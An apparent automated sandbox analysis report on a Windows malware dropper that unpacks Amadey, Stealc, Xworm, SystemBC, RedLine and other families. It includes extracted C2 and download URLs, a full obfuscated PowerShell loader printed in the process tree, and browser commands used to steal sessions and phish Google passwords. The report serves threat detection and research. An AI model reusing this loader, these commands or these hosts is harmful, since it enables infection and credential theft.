Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 18:28

General

  • Target

    c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe

  • Size

    5.5MB

  • MD5

    adbdacaaa99af43ad5e4bfb84c2695b3

  • SHA1

    3356d266532067786bc20048346c5ccc5c26680b

  • SHA256

    c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670

  • SHA512

    a123879d0ba85b72b6965859aa08c2c6e6439f501ca7541beb89d5d13c19a774a1af370125c232dfb02d981ef7f10ca35460fe8aad0e11c80b1d4140ce6418aa

  • SSDEEP

    98304:0z/V1YLUtSRelU4RPYUH3DgsFNaPfLhzVrdh7dd+lKNJEmdY:g/TJtSkvHnkHR7hxddNJLdY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Detects GOST tunneling tool 1 IoCs

    A simple tunneling tool written in Golang

  • Downloads MZ/PE file 35 IoCs
  • Uses browser remote debugging 2 TTPs 13 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 42 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 62 IoCs
  • Identifies Wine through registry keys 2 TTPs 21 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 12 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 17 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
    "C:\Users\Admin\AppData\Local\Temp\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4888
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x8b75.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1M25d5.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:1544
          • C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
            "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
            5⤵
            • Executes dropped EXE
            PID:2044
          • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
            "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3068
            • C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
              "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1832
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 960
              6⤵
              • Program crash
              PID:4524
          • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
            "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2264
            • C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
              "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2952
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 960
              6⤵
              • Program crash
              PID:2680
          • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
            "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1560
            • C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
              "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4840
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 960
              6⤵
              • Program crash
              PID:2268
          • C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe
            "C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:4212
            • C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe
              "C:\Users\Admin\AppData\Local\Temp\1087664001\NLHQOm0.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2508
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 964
              6⤵
              • Program crash
              PID:3824
          • C:\Users\Admin\AppData\Local\Temp\1087739001\amnew.exe
            "C:\Users\Admin\AppData\Local\Temp\1087739001\amnew.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:5068
            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
              6⤵
              • Downloads MZ/PE file
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:4344
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:1560
                • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                  "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1048
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 960
                  8⤵
                  • Program crash
                  PID:3260
              • C:\Users\Admin\AppData\Local\Temp\10008690101\0874a5f937.exe
                "C:\Users\Admin\AppData\Local\Temp\10008690101\0874a5f937.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:556
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1948
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3504
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3336
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5100
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4296
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  8⤵
                    PID:1568
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      9⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of SetWindowsHookEx
                      PID:2384
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a0ef11e-8878-41e1-98a6-67af85d27de3} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" gpu
                        10⤵
                          PID:2292
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e99a7f38-aa96-4ae2-b512-47fa45b009c7} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" socket
                          10⤵
                            PID:1948
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2888 -childID 1 -isForBrowser -prefsHandle 2844 -prefMapHandle 3024 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6dfa399-bff5-4776-9d44-53b61a367dc9} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab
                            10⤵
                              PID:1292
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3744 -childID 2 -isForBrowser -prefsHandle 3740 -prefMapHandle 2880 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd306d90-0058-453e-bff0-e6b00c3268ca} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab
                              10⤵
                                PID:1648
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4500 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4536 -prefMapHandle 4532 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {944cdf8f-0586-4d9b-a8b2-a1f0754c07b2} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" utility
                                10⤵
                                • Checks processor information in registry
                                PID:5128
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5324 -childID 3 -isForBrowser -prefsHandle 5284 -prefMapHandle 5260 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {198417a7-66aa-4ea2-b47d-6dd21eb2c1a2} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab
                                10⤵
                                  PID:1560
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d13a4b84-1a40-4213-8709-54da0da52fbf} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab
                                  10⤵
                                    PID:4360
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5688 -prefMapHandle 5692 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a114b87a-fb14-4ac7-8c6b-511674c77f98} 2384 "\\.\pipe\gecko-crash-server-pipe.2384" tab
                                    10⤵
                                      PID:2340
                              • C:\Users\Admin\AppData\Local\Temp\10008700101\af1884c123.exe
                                "C:\Users\Admin\AppData\Local\Temp\10008700101\af1884c123.exe"
                                7⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:5444
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  8⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:5624
                          • C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe
                            "C:\Users\Admin\AppData\Local\Temp\1087747001\yOO5EOR.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                            • C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe
                              "C:\Users\Admin\AppData\Local\Temp\DotStealerBuild.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4912
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu
                                7⤵
                                • Uses browser remote debugging
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5752
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x168,0x16c,0x170,0x140,0x174,0x7ffacc3bcc40,0x7ffacc3bcc4c,0x7ffacc3bcc58
                                  8⤵
                                    PID:5760
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1540,i,16847720530577338918,4025609293299681543,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1532 /prefetch:2
                                    8⤵
                                      PID:6060
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1680,i,16847720530577338918,4025609293299681543,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1676 /prefetch:3
                                      8⤵
                                        PID:6080
                                • C:\Users\Admin\AppData\Local\Temp\1087754001\yOO5EOR.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087754001\yOO5EOR.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4280
                                • C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:1304
                                  • C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087755001\YMci4Rc.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:824
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 948
                                    6⤵
                                    • Program crash
                                    PID:752
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1087756041\tYliuwV.ps1"
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops startup file
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5836
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:6840
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:7012
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      7⤵
                                      • Blocklisted process makes network request
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:7028
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5328
                                • C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:6532
                                  • C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087757001\9aiiMOQ.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:6636
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 964
                                    6⤵
                                    • Program crash
                                    PID:6764
                                • C:\Users\Admin\AppData\Local\Temp\1087758001\C3hYpvm.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087758001\C3hYpvm.exe"
                                  5⤵
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1168
                                • C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  PID:5736
                                  • C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1087759001\NLHQOm0.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5784
